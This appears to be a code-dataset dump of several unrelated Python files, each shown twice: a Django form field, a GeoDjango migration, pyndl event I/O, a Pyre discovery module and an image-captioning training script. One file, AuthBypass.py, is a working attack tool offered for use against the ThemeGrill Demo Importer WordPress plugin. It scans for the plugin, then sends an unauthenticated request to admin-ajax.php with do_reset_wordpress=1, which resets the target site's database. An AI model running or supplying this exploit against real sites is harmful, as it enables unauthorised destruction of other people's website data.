fields = [
CharField(
label=attr["label"],
initial=attr.get("default"),
required=attr["required"],
)
for attr in self.clean_attributes
]
self.widget = AttributesJSONWidget(attributes_json=self.clean_attributes)
if django.VERSION >= (3, 1):
# MultiValueField does not receive as kwargs the encoder or decoder
kwargs.pop("encoder")
kwargs.pop("decoder")
super().__init__(fields=fields, require_all_fields=require_all_fields, **kwargs)
def compress(self, data_list):
if data_list:
data = {}
for i, attribute in enumerate(self.clean_attributes):
data[attribute["name"]] = data_list[i]
return data
return None | attributesjsonfield/forms/fields.py | import django
from django.forms import MultiValueField, CharField
from attributesjsonfield.widgets import AttributesJSONWidget
class AttributesJSONField(MultiValueField):
""" """
widget = AttributesJSONWidget
def __init__(self, *args, attributes=None, require_all_fields=False, **kwargs):
self.attributes = attributes
self.clean_attributes = []
if self.attributes:
for attr in self.attributes:
is_dict = type(attr) == dict
field = attr["field"] if is_dict else attr
if is_dict:
label = attr.get("verbose_name", field)
required = attr.get("required", True)
else:
label = field
required = True
self.clean_attributes.append(
{
"field": field,
"label": label,
"name": field,
"choices": attr.get("choices") if is_dict else None,
"required": required,
"default": attr.get("default") if is_dict else None,
"data_type": attr.get("data_type") if is_dict else None,
}
)
else:
self.clean_attributes = None
fields = [
CharField(
label=attr["label"],
initial=attr.get("default"),
required=attr["required"],
)
for attr in self.clean_attributes
]
self.widget = AttributesJSONWidget(attributes_json=self.clean_attributes)
if django.VERSION >= (3, 1):
# MultiValueField does not receive as kwargs the encoder or decoder
kwargs.pop("encoder")
kwargs.pop("decoder")
super().__init__(fields=fields, require_all_fields=require_all_fields, **kwargs)
def compress(self, data_list):
if data_list:
data = {}
for i, attribute in enumerate(self.clean_attributes):
data[attribute["name"]] = data_list[i]
return data
return None | 0.402862 | 0.109206 |
from __future__ import unicode_literals
import django.contrib.gis.db.models.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Chair',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('gisId', models.IntegerField()),
('longLat', django.contrib.gis.db.models.fields.PointField(geography=True, srid=4326)),
],
),
migrations.CreateModel(
name='Tree',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comId', models.IntegerField()),
('yearPlanted', models.IntegerField(null=True)),
('longLat', django.contrib.gis.db.models.fields.PointField(geography=True, srid=4326)),
],
),
migrations.CreateModel(
name='TreeType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('commonName', models.CharField(max_length=50)),
('scientificName', models.CharField(max_length=50)),
('genus', models.CharField(max_length=50)),
('family', models.CharField(max_length=50)),
('scarcity', models.IntegerField()),
('license', models.CharField(max_length=100, null=True)),
('artist', models.TextField(max_length=1024, null=True)),
('imageUrl', models.TextField(max_length=1024, null=True)),
('description', models.TextField(max_length=1024, null=True)),
],
),
migrations.AddField(
model_name='tree',
name='treeType',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='trees.TreeType'),
),
] | server/trees/migrations/0001_initial.py | from __future__ import unicode_literals
import django.contrib.gis.db.models.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Chair',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('gisId', models.IntegerField()),
('longLat', django.contrib.gis.db.models.fields.PointField(geography=True, srid=4326)),
],
),
migrations.CreateModel(
name='Tree',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comId', models.IntegerField()),
('yearPlanted', models.IntegerField(null=True)),
('longLat', django.contrib.gis.db.models.fields.PointField(geography=True, srid=4326)),
],
),
migrations.CreateModel(
name='TreeType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('commonName', models.CharField(max_length=50)),
('scientificName', models.CharField(max_length=50)),
('genus', models.CharField(max_length=50)),
('family', models.CharField(max_length=50)),
('scarcity', models.IntegerField()),
('license', models.CharField(max_length=100, null=True)),
('artist', models.TextField(max_length=1024, null=True)),
('imageUrl', models.TextField(max_length=1024, null=True)),
('description', models.TextField(max_length=1024, null=True)),
],
),
migrations.AddField(
model_name='tree',
name='treeType',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='trees.TreeType'),
),
] | 0.619932 | 0.16228 |
import requests
import time
import json
import argparse
print(' ')
print(""" ||||||| | | |||||||| | |
| | | | || | |
||||||| | | || ||||||
| | | | || | |
| | ||||||| || | |
__________________________________
Bypass WordPress ThemeGrill Plugin
----------------------------------
@UnknownHimash
Type -h for the help
Example AuthBypass.py -s http://site.com
AuhtBypass.py -e http://site.com
AuthBypass.py -s http://1.2.3.4
AuhtBypass.py -e http://1.2.3.4
""")
def main(arguments):
if arguments.e:
exploit(arguments.e)
if arguments.s:
scan(arguments.s)
def scan(arg):
try:
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded",
"Connection": "keep-alive"
}
url = arg + "/wp-content/plugins/themegrill-demo-importer/includes/class-demo-importer.php"
print (" Scanning the Target.......! \n")
scan_response = requests.get(url)
if scan_response.status_code == 200:
print(" Target is Vulnerable ...!")
else:
print(" Target is not Vulnerable\n")
except:
print(" Unable to Scan the Target ")
def exploit(arg):
try:
data = {"action":"heartbeat"}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded",
"Connection": "keep-alive"
}
url = arg + "/wp-admin/admin-ajax.php?do_reset_wordpress=1"
print (" Exploiting the Target ......... ")
response = requests.post(url, data, headers=headers)
if response.status_code == 200:
print(" Target Exploited .....!\n")
else:
print(" Target is not Exploitable .... !\n")
except:
print(" Unable to Exploit the Target ...")
if __name__ == "__main__":
try:
description = 'ThemeGrill Wordpress Plugin Vulnerability Scan & Exploit'
parser = argparse.ArgumentParser(description=description)
parser.add_argument("-s",type=str, help= " To Scan the Target Type -s ")
parser.add_argument("-e",type=str, help= "To Exploit the Target Type -e")
arguments = parser.parse_args()
main(arguments)
except(KeyboardInterrupt) as e:
sys.exit(0) | AuthBypass.py |
import requests
import time
import json
import argparse
print(' ')
print(""" ||||||| | | |||||||| | |
| | | | || | |
||||||| | | || ||||||
| | | | || | |
| | ||||||| || | |
__________________________________
Bypass WordPress ThemeGrill Plugin
----------------------------------
@UnknownHimash
Type -h for the help
Example AuthBypass.py -s http://site.com
AuhtBypass.py -e http://site.com
AuthBypass.py -s http://1.2.3.4
AuhtBypass.py -e http://1.2.3.4
""")
def main(arguments):
if arguments.e:
exploit(arguments.e)
if arguments.s:
scan(arguments.s)
def scan(arg):
try:
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded",
"Connection": "keep-alive"
}
url = arg + "/wp-content/plugins/themegrill-demo-importer/includes/class-demo-importer.php"
print (" Scanning the Target.......! \n")
scan_response = requests.get(url)
if scan_response.status_code == 200:
print(" Target is Vulnerable ...!")
else:
print(" Target is not Vulnerable\n")
except:
print(" Unable to Scan the Target ")
def exploit(arg):
try:
data = {"action":"heartbeat"}
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded",
"Connection": "keep-alive"
}
url = arg + "/wp-admin/admin-ajax.php?do_reset_wordpress=1"
print (" Exploiting the Target ......... ")
response = requests.post(url, data, headers=headers)
if response.status_code == 200:
print(" Target Exploited .....!\n")
else:
print(" Target is not Exploitable .... !\n")
except:
print(" Unable to Exploit the Target ...")
if __name__ == "__main__":
try:
description = 'ThemeGrill Wordpress Plugin Vulnerability Scan & Exploit'
parser = argparse.ArgumentParser(description=description)
parser.add_argument("-s",type=str, help= " To Scan the Target Type -s ")
parser.add_argument("-e",type=str, help= "To Exploit the Target Type -e")
arguments = parser.parse_args()
main(arguments)
except(KeyboardInterrupt) as e:
sys.exit(0) | 0.114814 | 0.129348 |
import gzip
from collections.abc import Iterator, Iterable
import pandas as pd
def events_from_file(event_path, compression="gzip"):
"""
Yields events for all events in a gzipped event file.
Parameters
----------
event_path : str
path to gzipped event file
compression : str
indicates whether the events should be read from gunzip
file or not can be {"gzip" or None}
Yields
------
cues, outcomes : list, list
a tuple of two lists containing cues and outcomes
"""
if compression == "gzip":
event_file = gzip.open(event_path, 'rt')
elif compression is None:
event_file = open(event_path, 'rt')
else:
raise ValueError("compression needs to be 'gzip' or None")
try:
# skip header
event_file.readline()
for line in event_file:
cues, outcomes = line.strip('\n').split('\t')
cues = cues.split('_')
outcomes = outcomes.split('_')
yield (cues, outcomes)
finally:
event_file.close()
def events_to_file(events, file_path, delimiter="\t", compression="gzip",
columns=("cues", "outcomes")):
"""
Writes events to a file
Parameters
----------
events : pandas.DataFrame or Iterator or Iterable
a pandas DataFrame with one event per row and one colum with the cues
and one column with the outcomes or a list of cues and outcomes as strings
or a list of a list of cues and a list of outcomes which should be written
to a file
file_path: str
path to where the file should be saved
delimiter: str
Seperator which should be used. Default ist a tab
compression : str
indicates whether the events should be read from gunzip
file or not can be {"gzip" or None}
columns: tuple
a tuple of column names
"""
if isinstance(events, pd.DataFrame):
events = events_from_dataframe(events)
elif isinstance(events, (Iterator, Iterable)):
events = events_from_list(events)
else:
raise ValueError("events should either be a pd.DataFrame or an Iterator or an Iterable.")
if compression == "gzip":
out_file = gzip.open(file_path, 'wt')
elif compression is None:
out_file = open(file_path, 'wt')
else:
raise ValueError("compression needs to be 'gzip' or None")
try:
out_file.write("{}\n".format(delimiter.join(columns)))
for cues, outcomes in events:
if isinstance(cues, list) and isinstance(outcomes, list):
line = "{}{}{}\n".format("_".join(cues),
delimiter,
"_".join(outcomes))
elif isinstance(cues, str) and isinstance(outcomes, str):
line = "{}{}{}\n".format(cues, delimiter, outcomes)
else:
raise ValueError("cues and outcomes should either be a list or a string.")
out_file.write(line)
finally:
out_file.close()
def events_from_dataframe(df, columns=("cues", "outcomes")):
"""
Yields events for all events in a pandas dataframe.
Parameters
----------
df : pandas.DataFrame
a pandas DataFrame with one event per row and one colum with the cues
and one column with the outcomes.
columns : tuple
a tuple of column names
Yields
------
cues, outcomes : list, list
a tuple of two lists containing cues and outcomes
"""
for _, row in df.iterrows():
cues, outcomes = row[list(columns)]
cues = cues.split('_')
outcomes = outcomes.split('_')
yield (cues, outcomes)
def events_from_list(lst):
"""
Yields events for all events in a list.
Parameters
----------
lst : list of list of str or list of str
a list either containing a list of cues as strings and a list of outcomes
as strings or a list containing a cue and an outcome string, where cues
respectively outcomes are seperated by an undescore
Yields
------
cues, outcomes : list, list
a tuple of two lists containing cues and outcomes
"""
for cues, outcomes in lst:
if isinstance(cues, str):
cues = cues.split('_')
if isinstance(outcomes, str):
outcomes = outcomes.split('_')
yield (cues, outcomes) | pyndl/io.py | import gzip
from collections.abc import Iterator, Iterable
import pandas as pd
def events_from_file(event_path, compression="gzip"):
"""
Yields events for all events in a gzipped event file.
Parameters
----------
event_path : str
path to gzipped event file
compression : str
indicates whether the events should be read from gunzip
file or not can be {"gzip" or None}
Yields
------
cues, outcomes : list, list
a tuple of two lists containing cues and outcomes
"""
if compression == "gzip":
event_file = gzip.open(event_path, 'rt')
elif compression is None:
event_file = open(event_path, 'rt')
else:
raise ValueError("compression needs to be 'gzip' or None")
try:
# skip header
event_file.readline()
for line in event_file:
cues, outcomes = line.strip('\n').split('\t')
cues = cues.split('_')
outcomes = outcomes.split('_')
yield (cues, outcomes)
finally:
event_file.close()
def events_to_file(events, file_path, delimiter="\t", compression="gzip",
columns=("cues", "outcomes")):
"""
Writes events to a file
Parameters
----------
events : pandas.DataFrame or Iterator or Iterable
a pandas DataFrame with one event per row and one colum with the cues
and one column with the outcomes or a list of cues and outcomes as strings
or a list of a list of cues and a list of outcomes which should be written
to a file
file_path: str
path to where the file should be saved
delimiter: str
Seperator which should be used. Default ist a tab
compression : str
indicates whether the events should be read from gunzip
file or not can be {"gzip" or None}
columns: tuple
a tuple of column names
"""
if isinstance(events, pd.DataFrame):
events = events_from_dataframe(events)
elif isinstance(events, (Iterator, Iterable)):
events = events_from_list(events)
else:
raise ValueError("events should either be a pd.DataFrame or an Iterator or an Iterable.")
if compression == "gzip":
out_file = gzip.open(file_path, 'wt')
elif compression is None:
out_file = open(file_path, 'wt')
else:
raise ValueError("compression needs to be 'gzip' or None")
try:
out_file.write("{}\n".format(delimiter.join(columns)))
for cues, outcomes in events:
if isinstance(cues, list) and isinstance(outcomes, list):
line = "{}{}{}\n".format("_".join(cues),
delimiter,
"_".join(outcomes))
elif isinstance(cues, str) and isinstance(outcomes, str):
line = "{}{}{}\n".format(cues, delimiter, outcomes)
else:
raise ValueError("cues and outcomes should either be a list or a string.")
out_file.write(line)
finally:
out_file.close()
def events_from_dataframe(df, columns=("cues", "outcomes")):
"""
Yields events for all events in a pandas dataframe.
Parameters
----------
df : pandas.DataFrame
a pandas DataFrame with one event per row and one colum with the cues
and one column with the outcomes.
columns : tuple
a tuple of column names
Yields
------
cues, outcomes : list, list
a tuple of two lists containing cues and outcomes
"""
for _, row in df.iterrows():
cues, outcomes = row[list(columns)]
cues = cues.split('_')
outcomes = outcomes.split('_')
yield (cues, outcomes)
def events_from_list(lst):
"""
Yields events for all events in a list.
Parameters
----------
lst : list of list of str or list of str
a list either containing a list of cues as strings and a list of outcomes
as strings or a list containing a cue and an outcome string, where cues
respectively outcomes are seperated by an undescore
Yields
------
cues, outcomes : list, list
a tuple of two lists containing cues and outcomes
"""
for cues, outcomes in lst:
if isinstance(cues, str):
cues = cues.split('_')
if isinstance(outcomes, str):
outcomes = outcomes.split('_')
yield (cues, outcomes) | 0.740644 | 0.392744 |
from pyre import Pyre
from pyre import zhelper
import threading
import zmq
import uuid
import logging
import json
import time
from uniflex.core import modules
from uniflex.core import events
__author__ = "<NAME>"
__copyright__ = "Copyright (c) 2015, Technische Universitat Berlin"
__version__ = "0.1.0"
__email__ = <EMAIL>"
class PyreDiscoverySlaveModule(modules.ControlApplication):
def __init__(self, iface, groupName="uniflex"):
super(PyreDiscoverySlaveModule, self).__init__()
self.log = logging.getLogger('pyre_discovery_module.main')
pyreLogger = logging.getLogger('pyre')
pyreLogger.setLevel(logging.CRITICAL)
self.running = False
self.iface = iface
self.controller_dl = None
self.controller_ul = None
self.groupName = groupName
self.discovery_pipe = None
self.ctx = zmq.Context()
def _receive_announcements(self):
while self.running:
# self.log.debug("Discovery procedure running".format())
time.sleep(2)
@modules.on_start()
@modules.on_disconnected()
def start_discovery(self):
if self.running:
return
self.log.debug("Start discovery procedure".format())
self.running = True
self.controller_dl = None
self.controller_ul = None
self.discovery_pipe = zhelper.zthread_fork(
self.ctx, self.discovery_task)
d = threading.Thread(target=self._receive_announcements)
d.setDaemon(True)
d.start()
return True
@modules.on_exit()
@modules.on_connected()
def stop_discovery(self):
self.log.debug("Stop discovery announcements".format())
if self.running:
self.running = False
self.discovery_pipe.send("$$STOP".encode('utf_8'))
def discovery_task(self, ctx, pipe):
self.log.debug("Pyre on iface : {}".format(self.iface))
n = Pyre(self.groupName, sel_iface=self.iface)
n.set_header("DISCOVERY_Header1", "DISCOVERY_HEADER")
n.join(self.groupName)
n.start()
poller = zmq.Poller()
poller.register(pipe, zmq.POLLIN)
poller.register(n.inbox, zmq.POLLIN)
while(True):
items = dict(poller.poll())
if pipe in items and items[pipe] == zmq.POLLIN:
message = pipe.recv()
# message to quit
if message.decode('utf-8') == "$$STOP":
break
if n.inbox in items and items[n.inbox] == zmq.POLLIN:
cmds = n.recv()
self.log.debug("NODE_MSG CONT:{}".format(cmds))
msg_type = cmds.pop(0)
peer_uuid_bytes = cmds.pop(0)
peer_uuid = uuid.UUID(bytes=peer_uuid_bytes)
self.log.debug("NODE_MSG TYPE: {}".format(msg_type))
self.log.debug("NODE_MSG PEER: {}".format(peer_uuid))
if msg_type.decode('utf-8') == "SHOUT":
group_name = cmds.pop(0)
self.log.debug("NODE_MSG GROUP: {}".format(group_name))
group_name_2 = cmds.pop(0)
self.log.debug("NODE_MSG GROUP_2: {}".format(group_name_2))
discoveryMsg = cmds.pop(0)
self.log.debug("Discovery Msg : {}".format(discoveryMsg))
controller = json.loads(discoveryMsg.decode('utf-8'))
self.controller_dl = str(controller["downlink"])
self.controller_ul = str(controller["uplink"])
self.log.debug("Discovered Controller DL-{}, UL-{}"
.format(self.controller_dl,
self.controller_ul))
self.send_event(
events.BrokerDiscoveredEvent(
self.controller_dl, self.controller_ul)
)
n.stop() | apps/discovery_pyre/uniflex_app_discovery_pyre/pyre_discovery_slave_module.py | from pyre import Pyre
from pyre import zhelper
import threading
import zmq
import uuid
import logging
import json
import time
from uniflex.core import modules
from uniflex.core import events
__author__ = "<NAME>"
__copyright__ = "Copyright (c) 2015, Technische Universitat Berlin"
__version__ = "0.1.0"
__email__ = <EMAIL>"
class PyreDiscoverySlaveModule(modules.ControlApplication):
def __init__(self, iface, groupName="uniflex"):
super(PyreDiscoverySlaveModule, self).__init__()
self.log = logging.getLogger('pyre_discovery_module.main')
pyreLogger = logging.getLogger('pyre')
pyreLogger.setLevel(logging.CRITICAL)
self.running = False
self.iface = iface
self.controller_dl = None
self.controller_ul = None
self.groupName = groupName
self.discovery_pipe = None
self.ctx = zmq.Context()
def _receive_announcements(self):
while self.running:
# self.log.debug("Discovery procedure running".format())
time.sleep(2)
@modules.on_start()
@modules.on_disconnected()
def start_discovery(self):
if self.running:
return
self.log.debug("Start discovery procedure".format())
self.running = True
self.controller_dl = None
self.controller_ul = None
self.discovery_pipe = zhelper.zthread_fork(
self.ctx, self.discovery_task)
d = threading.Thread(target=self._receive_announcements)
d.setDaemon(True)
d.start()
return True
@modules.on_exit()
@modules.on_connected()
def stop_discovery(self):
self.log.debug("Stop discovery announcements".format())
if self.running:
self.running = False
self.discovery_pipe.send("$$STOP".encode('utf_8'))
def discovery_task(self, ctx, pipe):
self.log.debug("Pyre on iface : {}".format(self.iface))
n = Pyre(self.groupName, sel_iface=self.iface)
n.set_header("DISCOVERY_Header1", "DISCOVERY_HEADER")
n.join(self.groupName)
n.start()
poller = zmq.Poller()
poller.register(pipe, zmq.POLLIN)
poller.register(n.inbox, zmq.POLLIN)
while(True):
items = dict(poller.poll())
if pipe in items and items[pipe] == zmq.POLLIN:
message = pipe.recv()
# message to quit
if message.decode('utf-8') == "$$STOP":
break
if n.inbox in items and items[n.inbox] == zmq.POLLIN:
cmds = n.recv()
self.log.debug("NODE_MSG CONT:{}".format(cmds))
msg_type = cmds.pop(0)
peer_uuid_bytes = cmds.pop(0)
peer_uuid = uuid.UUID(bytes=peer_uuid_bytes)
self.log.debug("NODE_MSG TYPE: {}".format(msg_type))
self.log.debug("NODE_MSG PEER: {}".format(peer_uuid))
if msg_type.decode('utf-8') == "SHOUT":
group_name = cmds.pop(0)
self.log.debug("NODE_MSG GROUP: {}".format(group_name))
group_name_2 = cmds.pop(0)
self.log.debug("NODE_MSG GROUP_2: {}".format(group_name_2))
discoveryMsg = cmds.pop(0)
self.log.debug("Discovery Msg : {}".format(discoveryMsg))
controller = json.loads(discoveryMsg.decode('utf-8'))
self.controller_dl = str(controller["downlink"])
self.controller_ul = str(controller["uplink"])
self.log.debug("Discovered Controller DL-{}, UL-{}"
.format(self.controller_dl,
self.controller_ul))
self.send_event(
events.BrokerDiscoveredEvent(
self.controller_dl, self.controller_ul)
)
n.stop() | 0.344443 | 0.059183 |
def warn(*args, **kwargs):
pass
import warnings
warnings.warn = warn
import torch
import torch.nn as nn
from torchvision import transforms
import sys
sys.path.append('/opt/cocoapi/PythonAPI')
from pycocotools.coco import COCO
from data_loader import get_loader
from data_loader_val import get_loader_val
from model import EncoderCNN, EncoderCNN152, DecoderRNN
import math
import torch.utils.data as data
import numpy as np
import os
import argparse
from nltk.translate.bleu_score import sentence_bleu
from time import time, gmtime, strftime
def clean_sentence(output, idx2word):
sentence = ''
for x in output:
word = idx2word[x]
if word == '<end>':
break
elif word == '<start>':
pass
elif word == '.':
sentence += word
else:
sentence += ' ' + word
return sentence.strip()
def get_avg_bleu_score(outputs, references, idx2word, weights=(0.25, 0.25, 0.25, 0.25)):
score = 0
for i in range(len(outputs)):
output = clean_sentence(outputs[i], idx2word)
reference = clean_sentence(references[i], idx2word)
score += sentence_bleu([reference], output, weights)
score /= len(outputs)
return score
def main(args):
log_file = os.path.join(args.output_path, 'training_log.txt') # name of file with saved training loss and perplexity
# Open the training log file.
f = open(log_file, 'w')
f.write(str(args) + '\n')
f.flush()
#image transform below.
transform_train = transforms.Compose([
transforms.Resize(256), # smaller edge of image resized to 256
transforms.RandomCrop(224), # get 224x224 crop from random location
transforms.RandomHorizontalFlip(), # horizontally flip image with probability=0.5
transforms.ToTensor(), # convert the PIL Image to a tensor
transforms.Normalize((0.485, 0.456, 0.406), # normalize image for pre-trained model
(0.229, 0.224, 0.225))])
#image transform below.
transform_val = transforms.Compose([
transforms.Resize(256), # smaller edge of image resized to 256
transforms.RandomCrop(224), # get 224x224 crop from random location
transforms.ToTensor(), # convert the PIL Image to a tensor
transforms.Normalize((0.485, 0.456, 0.406), # normalize image for pre-trained model
(0.229, 0.224, 0.225))])
# Build data loader.
data_loader = get_loader(transform=transform_train,
mode='train',
batch_size=args.batch_size,
vocab_threshold=args.vocab_threshold,
vocab_from_file=False)
data_loader_val = get_loader_val(transform=transform_val,
batch_size=256)
# The size of the vocabulary.
vocab_size = len(data_loader.dataset.vocab)
# Initialize the encoder and decoder.
if (args.net == 'resnet50'):
encoder = EncoderCNN(args.embed_size)
elif (args.net == 'resnet152'):
encoder = EncoderCNN152(args.embed_size)
decoder = DecoderRNN(args.embed_size, args.hidden_size, vocab_size, num_layers= args.num_layers)
# Move models to GPU if CUDA is available.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
encoder.to(device)
decoder.to(device)
# Define the loss function.
criterion = nn.CrossEntropyLoss().cuda() if torch.cuda.is_available() else nn.CrossEntropyLoss()
# TODO #3: Specify the learnable parameters of the model.
if (args.net == 'resnet50'):
params = list(decoder.parameters()) + list(encoder.embed.parameters())
elif (args.net == 'resnet152'):
params = list(decoder.parameters()) + list(encoder.embed.parameters()) + list(encoder.bn.parameters())
# TODO #4: Define the optimizer.
optimizer = torch.optim.Adam(params, lr=args.learning_rate)
# Set the total number of training steps per epoch.
total_step = math.ceil(len(data_loader.dataset.caption_lengths) / data_loader.batch_sampler.batch_size)
total_step_val = math.ceil(len(data_loader_val.dataset.caption_lengths) / data_loader_val.batch_sampler.batch_size)
start_time = time()
epoch_stats = np.zeros((args.num_epochs, 8))
for epoch in range(1, args.num_epochs+1):
encoder.train()
decoder.train()
epoch_time = time()
epoch_loss = 0
for i_step in range(1, total_step+1):
# Randomly sample a caption length, and sample indices with that length.
indices = data_loader.dataset.get_train_indices()
# Create and assign a batch sampler to retrieve a batch with the sampled indices.
new_sampler = data.sampler.SubsetRandomSampler(indices=indices)
data_loader.batch_sampler.sampler = new_sampler
# Obtain the batch.
images, captions = next(iter(data_loader))
# Move batch of images and captions to GPU if CUDA is available.
images = images.to(device)
captions = captions.to(device)
# Zero the gradients.
decoder.zero_grad()
encoder.zero_grad()
# Pass the inputs through the CNN-RNN model.
features = encoder(images)
outputs = decoder(features, captions)
# Calculate the batch loss.
loss = criterion(outputs.view(-1, vocab_size), captions.view(-1))
epoch_loss += loss.item()
# Backward pass.
loss.backward()
# Update the parameters in the optimizer.
optimizer.step()
# Get training statistics.
stats = 'Epoch [%d/%d], Step [%d/%d], Loss: %.4f, Perplexity: %5.4f' % (epoch, args.num_epochs, i_step, total_step, loss.item(), np.exp(loss.item()))
# Print training statistics (on same line).
print('\r' + stats, end="")
sys.stdout.flush()
# Print training statistics to file.
f.write(stats + '\n')
f.flush()
# Print training statistics (on different line).
if i_step % args.log_step == 0:
print('\r' + stats)
# If debug option is enable, exit soon
if (args.debug == True):
break
epoch_stats[epoch-1,0] = epoch_loss / total_step
epoch_stats[epoch-1,1] = time() - epoch_time
encoder.eval()
decoder.eval()
epoch_time = time()
epoch_loss = 0
epoch_bleu1_score, epoch_bleu2_score, epoch_bleu3_score, epoch_bleu4_score = 0,0,0,0
for i_step in range(1, total_step_val+1):
# Randomly sample a caption length, and sample indices with that length.
indices = data_loader_val.dataset.get_train_indices()
# Create and assign a batch sampler to retrieve a batch with the sampled indices.
new_sampler = data.sampler.SubsetRandomSampler(indices=indices)
data_loader_val.batch_sampler.sampler = new_sampler
# Obtain the batch.
images, captions = next(iter(data_loader_val))
# Move batch of images and captions to GPU if CUDA is available.
images = images.to(device)
captions = captions.to(device)
# Pass the inputs through the CNN-RNN model.
features = encoder(images)
# Get predictions and output from decoder (to calculate LOSS)
outputs = decoder(features, captions)
predictions = decoder.sample(features, max_len = captions.shape[1])
# Calculate the batch loss.
outputs = outputs.to(device)
loss = criterion(outputs.view(-1, vocab_size), captions.view(-1))
epoch_loss += loss.item()
# Get validation statistics.
epoch_bleu1_score += get_avg_bleu_score(predictions, captions.tolist(),
data_loader_val.dataset.vocab.idx2word,
weights=(1, 0, 0, 0))
epoch_bleu2_score += get_avg_bleu_score(predictions, captions.tolist(),
data_loader_val.dataset.vocab.idx2word,
weights=(0.5, 0.5, 0, 0))
epoch_bleu3_score += get_avg_bleu_score(predictions, captions.tolist(),
data_loader_val.dataset.vocab.idx2word,
weights=(0.33, 0.33, 0.33, 0))
epoch_bleu4_score += get_avg_bleu_score(predictions, captions.tolist(),
data_loader_val.dataset.vocab.idx2word)
stats = 'Validation Epoch [%d/%d], Step [%d/%d], Loss: %.4f, BLEU-1/2/3/4: %.4f %.4f %.4f %.4f' % (epoch, args.num_epochs, i_step, total_step_val, loss.item(), epoch_bleu1_score/i_step, epoch_bleu2_score/i_step, epoch_bleu3_score/i_step, epoch_bleu4_score/i_step)
# Print validation statistics (on same line).
print('\r' + stats, end="")
sys.stdout.flush()
# Print validation statistics to file.
if i_step == total_step_val:
f.write(stats + '\n')
f.flush()
# If debug option is enabled, exit soon
if i_step % args.log_step == 0:
if (args.debug == True):
f.write(stats + '\n')
f.flush()
break
print("\n")
epoch_stats[epoch-1,2] = epoch_loss / total_step_val
epoch_stats[epoch-1,3] = time() - epoch_time
epoch_stats[epoch-1,4] = epoch_bleu1_score / total_step_val
epoch_stats[epoch-1,5] = epoch_bleu2_score / total_step_val
epoch_stats[epoch-1,6] = epoch_bleu3_score / total_step_val
epoch_stats[epoch-1,7] = epoch_bleu4_score / total_step_val
# Save the weights.
if epoch % args.save_step == 0:
torch.save(decoder.state_dict(), os.path.join(args.output_path, 'decoder-%d.pkl' % epoch))
torch.save(encoder.state_dict(), os.path.join(args.output_path, 'encoder-%d.pkl' % epoch))
tot_time = time() - start_time
elapsed = "\n** Total Elapsed Runtime:" + strftime("%H:%M:%S", gmtime(tot_time))
print(elapsed)
f.write(elapsed + '\n')
f.flush()
# Close the training log file.
f.close()
np.savetxt(os.path.join(args.output_path,"stats.csv"), epoch_stats, delimiter=",")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('output_path', type=str, nargs=1, help='path for saving trained model and output files')
parser.add_argument('--vocab_threshold', type=int, default=5, help='minimum word count threshold (default 5)')
parser.add_argument('--log_step', type=int , default=100, help='step size for printing log info (default 100)')
parser.add_argument('--save_step', type=int , default=1, help='save trained models every N epoch (default 1)')
# Model parameters
parser.add_argument('--net', default='resnet50', const='resnet50', nargs='?', choices=['resnet50', 'resnet152'],
help='encoder pretrained network (default resnet50")')
parser.add_argument('--embed_size', type=int , default=256, help='dimension of word embedding vectors (default 256)')
parser.add_argument('--hidden_size', type=int , default=512, help='dimension of lstm hidden states (default 512)')
parser.add_argument('--num_layers', type=int , default=1, help='number of layers in lstm (default 1)')
parser.add_argument('--num_epochs', type=int, default=5, help='training epochs (default 5)')
parser.add_argument('--batch_size', type=int, default=128, help='training batch size (default 128)')
#parser.add_argument('--num_workers', type=int, default=2)
parser.add_argument('--learning_rate', type=float, default=0.001, help='training learning rate (default 0.001)')
parser.add_argument('--debug', action='store_true', help='enable debug mode (one batch train & validation)')
args = parser.parse_args()
args.output_path = args.output_path[0]
# Debug options
if (args.debug == True):
args.num_epochs = 1
args.log_step = 10
if not os.path.exists(args.output_path):
os.makedirs(args.output_path)
with open(os.path.join(args.output_path,'commandline_args.txt'), 'w') as f:
f.write('\n'.join(sys.argv[1:]))
print(args)
main(args) | train.py | def warn(*args, **kwargs):
pass
import warnings
warnings.warn = warn
import torch
import torch.nn as nn
from torchvision import transforms
import sys
sys.path.append('/opt/cocoapi/PythonAPI')
from pycocotools.coco import COCO
from data_loader import get_loader
from data_loader_val import get_loader_val
